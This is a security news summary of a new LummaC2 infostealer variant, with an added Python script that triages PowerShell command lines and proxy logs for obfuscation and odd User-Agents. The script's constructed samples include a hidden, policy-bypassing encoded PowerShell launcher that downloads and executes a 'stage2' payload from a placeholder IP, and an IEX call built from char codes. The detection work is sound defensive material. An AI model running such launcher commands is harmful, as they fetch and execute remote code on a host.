A new variant of the LummaC2 malware, also known as the Lumma infostealer, has added more sophisticated obfuscation techniques and has been used in a growing number of attacks in recent weeks, Hackread reports.
The new variant is delivered by an obfuscated PowerShell command and then runs an AES-encrypted second-stage payload, which injects code into a Windows process to establish command-and-control communications and persistence and to carry out data theft, according to an Ontinue report. The analysis also found that the variant sends a custom User-Agent string in its network traffic in an attempt to evade detection. These findings follow the earlier emergence of a LummaC2 variant that used trigonometry on cursor movements to confirm a human user is present, an anti-sandbox check, before stealing data. Researchers said organizations should properly configure endpoint detection and response tools, enable attack surface reduction rules, and familiarize themselves with LummaC2's indicators of compromise.
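The two detection opportunities in that chain, an obfuscated PowerShell launcher and an unusual User-Agent, can be triaged from logs. The following Python is an added example written for this article; it is not code from Hackread, Ontinue or the malware's authors and contains no real LummaC2 indicator. The regexes, the log line format, the list of "known" User-Agent prefixes, the 203.0.113.10 address and the `ExampleCustomAgent/1.0` string are all assumptions constructed for illustration.

```python
"""Heuristic triage of (1) PowerShell command lines for obfuscation and
download-and-execute primitives and (2) proxy log lines whose User-Agent
is not a known client. All sample data below is constructed."""
import base64
import re

# Indicator regexes are assumptions for illustration, not published signatures.
PS_INDICATORS = {
    "encoded_command":   re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\b", re.I),
    "hidden_window":     re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    "no_profile":        re.compile(r"-(?:nop|noprofile)\b", re.I),
    "policy_bypass":     re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "web_download":      re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", re.I),
    "base64_decode":     re.compile(r"frombase64string", re.I),
    "char_code_build":   re.compile(r"\[char\]\s*\d+", re.I),  # "IEX" built from char codes
}
# Any one of these is enough to flag a command line on its own.
STRONG = {"encoded_command", "char_code_build", "base64_decode"}

# -EncodedCommand takes base64 of a UTF-16LE script; capture the blob.
ENC_RX = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand script, or None if absent/undecodable."""
    m = ENC_RX.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell(cmdline):
    """Sorted indicator names hit by the command line and by its decoded payload.
    The base64 blob is replaced by a placeholder so its characters cannot
    accidentally match an indicator."""
    texts = [ENC_RX.sub(" -EncodedCommand <blob>", cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        texts.append(decoded)
    hits = {name for text in texts for name, rx in PS_INDICATORS.items() if rx.search(text)}
    return sorted(hits)


def is_suspicious(cmdline, min_hits=2):
    """Flag on any strong indicator, or on min_hits weaker ones together."""
    hits = analyze_powershell(cmdline)
    return bool(STRONG.intersection(hits)) or len(hits) >= min_hits


# Constructed proxy log format: "<ts> <src_ip> <method> <url> <status> \"<user-agent>\"".
LOG_RX = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
KNOWN_UA_PREFIXES = ("Mozilla/", "Windows-Update-Agent/", "Microsoft-CryptoAPI/", "Microsoft BITS/")


def unusual_user_agents(log_lines, known_prefixes=KNOWN_UA_PREFIXES):
    """Return (src_ip, url, user_agent) for every line whose UA matches no known prefix."""
    flagged = []
    for line in log_lines:
        m = LOG_RX.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        _ts, src, _method, url, _status, ua = m.groups()
        if not ua.startswith(known_prefixes):
            flagged.append((src, url, ua))
    return flagged


def _encode(script):
    """Build a -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines (the second mimics a download-and-execute launcher).
SAMPLE_CMDLINES = [
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
    "powershell.exe -nop -w hidden -ep bypass -enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2')"),
    "powershell.exe -c \"$s=[char]73+[char]69+[char]88; & $s 'Get-Date'\"",  # spells IEX
]

# Constructed proxy log lines; the placeholder User-Agent is not a real indicator.
PROXY_LOG = [
    '2024-03-01T10:00:01Z 10.0.0.15 GET https://www.example.com/ 200 '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/122.0 Safari/537.36"',
    '2024-03-01T10:00:07Z 10.0.0.15 POST http://203.0.113.10/api 200 "ExampleCustomAgent/1.0"',
    '2024-03-01T10:00:09Z 10.0.0.22 GET https://download.example.net/x 200 '
    '"Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.0"',
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(is_suspicious(c), analyze_powershell(c))
    print(unusual_user_agents(PROXY_LOG))
```

The User-Agent check only catches a client that does not bother to imitate a browser; a custom string can equally be chosen to look like one, so in practice pair the allowlist with a rarity count per User-Agent across the estate and correlate with the PowerShell hits from the same host. The PowerShell heuristics should be fed from Script Block Logging (event 4104) or EDR process telemetry rather than raw 4688 events, since a hidden-window encoded launcher is exactly what those sources exist to expose.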